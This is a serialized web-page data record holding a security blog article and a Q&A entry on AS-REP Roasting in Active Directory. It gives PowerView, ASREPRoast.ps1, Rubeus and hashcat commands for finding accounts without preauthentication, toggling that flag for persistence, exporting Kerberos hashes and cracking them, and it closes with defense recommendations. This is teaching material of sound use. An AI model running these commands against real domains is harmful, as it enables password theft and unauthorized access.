[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-HhVsLl6z6yAq5kKhO2RTL1Crn04IeUa9QmbTIBy2tY":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},647,"How can an attacker identify vulnerable users and perform AS-REPRoasting?","Attackers can use PowerView's `Get-DomainUser -PreauthNotRequired` command to query users with the vulnerable flag (userAccountControl value 4194304). The hash is then exported using tools like [ASREPRoast.ps1](https:\u002F\u002Fgithub.com\u002FHarmJ0y\u002FASREPRoast) or Rubeus (e.g., `Rubeus.exe asreproast`). The extracted hash is formatted as `$krb5asrep$...` and can be cracked with hashcat using mode 18200.","\u003Cp>Attackers can use PowerView&#39;s `Get-DomainUser -PreauthNotRequired` command to query users with the vulnerable flag (userAccountControl value 4194304). The hash is then exported using tools like [ASREPRoast.ps1](https:\u002F\u002Fgithub.com\u002FHarmJ0y\u002FASREPRoast) or Rubeus (e.g., `Rubeus.exe asreproast`). The extracted hash is formatted as `$krb5asrep$...` and can be cracked with hashcat using mode 18200.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-as-reproasting\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-identify-vulnerable-users-and-perform-as-reproasting-1777482628387","AS-REPRoasting, PowerView, Rubeus, ASREPRoast, hash export",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},160,"Domain Penetration - AS-REPRoasting","domain-penetration-as-reproasting","Learn AS-REP Roasting: exploit users without Kerberos preauthentication to extract password hashes, crack with hashcat, and defend your domain.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Similar to Kerberoasting, AS-REP Roasting can obtain the hash of a user's password if certain conditions are met. By combining it with hashcat for cracking, the user's plaintext password can ultimately be recovered.\u003C\u002Fp>\u003Cp>This article will reference publicly available materials and combine personal understanding to introduce the exploitation methods of AS-REP Roasting, concluding with defensive recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>The principle of AS-REP Roasting\u003C\u002Fli>\u003Cli>The conditions for exploiting AS-REP Roasting\u003C\u002Fli>\u003Cli>The exploitation methods of AS-REP Roasting\u003C\u002Fli>\u003Cli>Methods for cracking hashes\u003C\u002Fli>\u003Cli>Defensive recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 AS-REP Roasting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Introduction\u003C\u002Fh3>\u003Cp>For domain users with the \"Do not require Kerberos preauthentication\" option enabled, sending an AS-REQ request to port 88 of the domain controller and reassembling the received AS-REP content can construct a \"Kerberos 5 AS-REP etype 23\" (18200) format. This can then be cracked using hashcat to ultimately obtain the user's plaintext password.\u003C\u002Fp>\u003Ch3>2. Prerequisites for Exploitation\u003C\u002Fh3>\u003Cp>The domain user has the \"Do not require Kerberos preauthentication\" option enabled.\u003C\u002Fp>\u003Cp>Typically, this option is not enabled by default.\u003C\u002Fp>\u003Ch3>3. Exploitation Approach\u003C\u002Fh3>\u003Cp>Commonly used in domain penetration for maintaining access.\u003C\u002Fp>\u003Cp>First, obtain GenericWrite permissions for the target user. The exploitation steps are as follows:\u003C\u002Fp>\u003Col>\u003Cli>Enable the user option \"Do not require Kerberos preauthentication\".\u003C\u002Fli>\u003Cli>Export the hash and crack it.\u003C\u002Fli>\u003Cli>Disable the user option \"Do not require Kerberos preauthentication\".\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 AS-REP Roasting Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Identifying Eligible Users\u003C\u002Fh3>\u003Cp>The user must have the \"Do not require Kerberos preauthentication\" option enabled.\u003C\u002Fp>\u003Cp>LDAP can be used here to query users that meet the condition (userAccountControl:1.2.840.113556.1.4.803:=4194304)\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F305144\u002Fhow-to-use-useraccountcontrol-to-manipulate-user-account-properties\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002F445f7b2510c4553dcd9451bc4daccb20c8e67cbb\u002FRecon\u002FPowerView.ps1#L4769\u003C\u002Fp>\u003Cp>The value corresponding to the DONT_REQ_PREAUTH item is 4194304\u003C\u002Fp>\u003Cp>The PowerView command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017299345_0_0bbc77fbf0.jpeg\">\u003C\u002Fp>\u003Cp>Display only the distinguishedname item:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017325552_1_2b8459fdc0.jpeg\">\u003C\u002Fp>\u003Ch3>2. Enable and disable the option \"Do not require Kerberos preauthentication\"\u003C\u002Fh3>\u003Cp>Enabling the option means adding the attribute to the user (userAccountControl=4194304)\u003C\u002Fp>\u003Cp>The command to enable the option is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Disabling the option means removing the user attribute (userAccountControl=4194304)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Here, XOR operation can be performed again; two XOR operations are equivalent to not changing the original value, i.e., removing the user attribute (userAccountControl)\u003C\u002Fp>\u003Cp>The command to disable the option is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Export hash\u003C\u002Fh3>\u003Ch4>(1) Using Powershell\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FHarmJ0y\u002FASREPRoast\u003C\u002Fp>\u003Cp>The command to export all available user hashes is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\ASREPRoast.ps1\u003Cbr>Invoke-ASREPRoast -Verbose |fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017376958_2_3246e95daf.jpeg\">\u003C\u002Fp>\u003Cp>The command to export the hash of a specified user is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-ASREPHash -UserName testb -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017396877_3_e7c799a4da.jpeg\">\u003C\u002Fp>\u003Cp>Extract the hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$krb5asrep$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Using C# (Rubeus)\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FGhostPack\u002FRubeus\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Rubeus.exe asreproast\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017442637_4_19ed1a6809.jpeg\">\u003C\u002Fp>\u003Ch3>4. Cracking with hashcat\u003C\u002Fh3>\u003Cp>Extract the hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$krb5asrep$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To format it for hashcat recognition, add $23 after $krb5asrep\u003C\u002Fp>\u003Cp>The parameters for hashcat dictionary attack are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>hashcat -m 18200 '$krb5asrep$23$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3' \u002Fusr\u002Fshare\u002Fjohn\u002Fpassword.lst -o found.txt --force\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter explanation:\u003C\u002Fp>\u003Cp>\u002Fusr\u002Fshare\u002Fjohn\u002Fpassword.lst is the location of the dictionary file\u003C\u002Fp>\u003Cp>-o found.txt indicates the output location\u003C\u002Fp>\u003Ch2>0x04 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Ensure there are no users with \"Do not require Kerberos preauthentication\" enabled in the domain\u003C\u002Fp>\u003Cp>Scanning method (using PowerView):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Enforce complex passwords for domain users to increase difficulty for dictionary and brute-force attacks\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation conditions and methods of AS-REP Roasting in domain penetration, providing defense recommendations\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Similar to Kerberoasting, AS-REP Roasting can obtain the hash of a user's password if certain conditions are met. By combining it with hashcat for cracking, the user's plaintext password can ultimately be recovered.\u003C\u002Fp>\u003Cp>This article will reference publicly available materials and combine personal understanding to introduce the exploitation methods of AS-REP Roasting, concluding with defensive recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>The principle of AS-REP Roasting\u003C\u002Fli>\u003Cli>The conditions for exploiting AS-REP Roasting\u003C\u002Fli>\u003Cli>The exploitation methods of AS-REP Roasting\u003C\u002Fli>\u003Cli>Methods for cracking hashes\u003C\u002Fli>\u003Cli>Defensive recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 AS-REP Roasting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Introduction\u003C\u002Fh3>\u003Cp>For domain users with the \"Do not require Kerberos preauthentication\" option enabled, sending an AS-REQ request to port 88 of the domain controller and reassembling the received AS-REP content can construct a \"Kerberos 5 AS-REP etype 23\" (18200) format. This can then be cracked using hashcat to ultimately obtain the user's plaintext password.\u003C\u002Fp>\u003Ch3>2. Prerequisites for Exploitation\u003C\u002Fh3>\u003Cp>The domain user has the \"Do not require Kerberos preauthentication\" option enabled.\u003C\u002Fp>\u003Cp>Typically, this option is not enabled by default.\u003C\u002Fp>\u003Ch3>3. Exploitation Approach\u003C\u002Fh3>\u003Cp>Commonly used in domain penetration for maintaining access.\u003C\u002Fp>\u003Cp>First, obtain GenericWrite permissions for the target user. The exploitation steps are as follows:\u003C\u002Fp>\u003Col>\u003Cli>Enable the user option \"Do not require Kerberos preauthentication\".\u003C\u002Fli>\u003Cli>Export the hash and crack it.\u003C\u002Fli>\u003Cli>Disable the user option \"Do not require Kerberos preauthentication\".\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 AS-REP Roasting Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Identifying Eligible Users\u003C\u002Fh3>\u003Cp>The user must have the \"Do not require Kerberos preauthentication\" option enabled.\u003C\u002Fp>\u003Cp>LDAP can be used here to query users that meet the condition (userAccountControl:1.2.840.113556.1.4.803:=4194304)\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F305144\u002Fhow-to-use-useraccountcontrol-to-manipulate-user-account-properties\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002F445f7b2510c4553dcd9451bc4daccb20c8e67cbb\u002FRecon\u002FPowerView.ps1#L4769\u003C\u002Fp>\u003Cp>The value corresponding to the DONT_REQ_PREAUTH item is 4194304\u003C\u002Fp>\u003Cp>The PowerView command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017299345_0_0bbc77fbf0-1.jpeg\">\u003C\u002Fp>\u003Cp>Display only the distinguishedname item:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017325552_1_2b8459fdc0-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Enable and disable the option \"Do not require Kerberos preauthentication\"\u003C\u002Fh3>\u003Cp>Enabling the option means adding the attribute to the user (userAccountControl=4194304)\u003C\u002Fp>\u003Cp>The command to enable the option is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Disabling the option means removing the user attribute (userAccountControl=4194304)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Here, XOR operation can be performed again; two XOR operations are equivalent to not changing the original value, i.e., removing the user attribute (userAccountControl)\u003C\u002Fp>\u003Cp>The command to disable the option is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Export hash\u003C\u002Fh3>\u003Ch4>(1) Using Powershell\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FHarmJ0y\u002FASREPRoast\u003C\u002Fp>\u003Cp>The command to export all available user hashes is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\ASREPRoast.ps1\u003Cbr>Invoke-ASREPRoast -Verbose |fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017376958_2_3246e95daf-1.jpeg\">\u003C\u002Fp>\u003Cp>The command to export the hash of a specified user is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-ASREPHash -UserName testb -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017396877_3_e7c799a4da-1.jpeg\">\u003C\u002Fp>\u003Cp>Extract the hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$krb5asrep$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Using C# (Rubeus)\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FGhostPack\u002FRubeus\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Rubeus.exe asreproast\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017442637_4_19ed1a6809-1.jpeg\">\u003C\u002Fp>\u003Ch3>4. Cracking with hashcat\u003C\u002Fh3>\u003Cp>Extract the hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$krb5asrep$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To format it for hashcat recognition, add $23 after $krb5asrep\u003C\u002Fp>\u003Cp>The parameters for hashcat dictionary attack are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>hashcat -m 18200 '$krb5asrep$23$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3' \u002Fusr\u002Fshare\u002Fjohn\u002Fpassword.lst -o found.txt --force\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter explanation:\u003C\u002Fp>\u003Cp>\u002Fusr\u002Fshare\u002Fjohn\u002Fpassword.lst is the location of the dictionary file\u003C\u002Fp>\u003Cp>-o found.txt indicates the output location\u003C\u002Fp>\u003Ch2>0x04 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Ensure there are no users with \"Do not require Kerberos preauthentication\" enabled in the domain\u003C\u002Fp>\u003Cp>Scanning method (using PowerView):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Enforce complex passwords for domain users to increase difficulty for dictionary and brute-force attacks\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation conditions and methods of AS-REP Roasting in domain penetration, providing defense recommendations\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",853,"Onedaysec",3,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"AS-REP Roasting Attack Guide: Exploit & Defense in Domain Penetration","AS-REP Roasting, domain penetration, Kerberos attack, hash cracking, preauthentication, PowerShell exploitation, Active Directory security, hashcat, userAccountControl, defensive recommendations",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],649,648,646,645,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.131Z","2026-07-23T16:01:53.874Z","draft","2026-07-23T16:13:57.682Z"]